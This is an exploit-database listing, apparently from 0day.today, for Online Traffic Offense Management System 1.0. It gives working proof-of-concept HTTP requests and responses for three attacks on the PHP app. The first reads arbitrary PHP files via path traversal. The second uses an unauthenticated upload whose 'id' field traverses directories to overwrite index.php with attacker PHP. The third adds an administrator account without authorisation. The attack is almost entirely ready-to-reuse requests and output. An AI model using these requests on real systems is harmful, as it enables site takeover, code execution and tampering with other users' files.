0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Online Traffic Offense Management System 1.0 - Privilage escalation Vulnerability
# Exploit Title: Online Traffic Offense Management System 1.0 - Privilage escalation (Unauthenticated) # Exploit Author: Hubert Wojciechowski # Contact Author: snup.php@gmail.com # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html # Version: 1.0 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### Privilage escalation # All requests can be sent by both an authenticated and a non-authenticated user # The vulnerabilities in the application allow for: * Reading any PHP file from the server * Saving files to parent and child directories and overwriting files in server * Performing operations by an unauthenticated user with application administrator rights ----------------------------------------------------------------------------------------------------------------------- # POC ----------------------------------------------------------------------------------------------------------------------- ## Example 1 - Reading any PHP file from the server Example vuln scripts: http://localhost/traffic_offense/index.php?p= http://localhost/traffic_offense/admin/?page= # Request reading rrr.php file from other user in serwer GET /traffic_offense/index.php?p=../phpwcms2/rrr HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 10:09:35 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Connection: close [...] </br></br>Hacked file other user in serwer!</br></br> [...] ----------------------------------------------------------------------------------------------------------------------- ## Example 2 - Saving files to parent and child directories and overwriting files in server # Request to read file GET /traffic_offense/index.php HTTP/1.1 Host: localhost Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Connection: close ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 10:30:56 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Set-Cookie: PHPSESSID=330s5p4flpokvjpl4nvfp4dj2t; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15095 <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Online Traffic Offense Management System - PHP</title> [...] ----------------------------------------------------------------------------------------------------------------------- # Request to overwrite file index.php in main directory webapp POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------329606699635951312463334027403 Content-Length: 1928 Origin: http://localhost Connection: close Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4 Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="id" 5/../../../index -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="license_id_no" GBN-1020061 -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="lastname" Blake -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="firstname" Claire -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="middlename" C -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="dob" 1992-10-12 -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="present_address" Sample Addss 123 -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="permanent_address" Sample Addess 123 -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="civil_status" Married -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="nationality" Filipino -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="contact" 09121789456 -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="license_type" Non-Professional -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="image_path" uploads/drivers/ -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="img"; filename="fuzzdb.php" Content-Type: image/png <?php echo "Hacked other client files in this hosting!"; ?> -----------------------------329606699635951312463334027403-- # New file have extention as this write filename="fuzzdb.php" # New file have name and locate 5/../../../index we can save file in other directory ;) # Line must start digit # We can rewrite config files ----------------------------------------------------------------------------------------------------------------------- # Respopnse HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 10:38:35 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 {"status":"success"} ----------------------------------------------------------------------------------------------------------------------- # Request to read file index.php again GET /traffic_offense/index.php HTTP/1.1 Host: localhost Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Connection: close ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 10:42:17 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Access-Control-Allow-Origin: * Content-Length: 42 Connection: close Content-Type: text/html; charset=UTF-8 Hacked other client files in this hosting! ----------------------------------------------------------------------------------------------------------------------- ## Example 4 - Performing operations by an unauthenticated user with application administrator rights # The application allows you to perform many operations without authorization, the application has no permission matrix. The entire application is vulnerable # Request adding new admin user to application by sending a request by an authorized user POST /traffic_offense/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685 Content-Length: 949 Origin: http://localhost Connection: close Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="id" 21 -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="firstname" hack -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="lastname" hack -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="username" hack -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="password" hack -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="type" 1 -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="img"; filename="aaa.php" Content-Type: application/octet-stream <?php phpinfo(); ?> -----------------------------210106920639395210803657370685-- ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 10:50:36 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Set-Cookie: PHPSESSID=2l1p4103dtj3j3vrod0t6rk6pn; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8 1 # The request worked fine, log into the app using your hack account # 0day.today [2024-12-24] #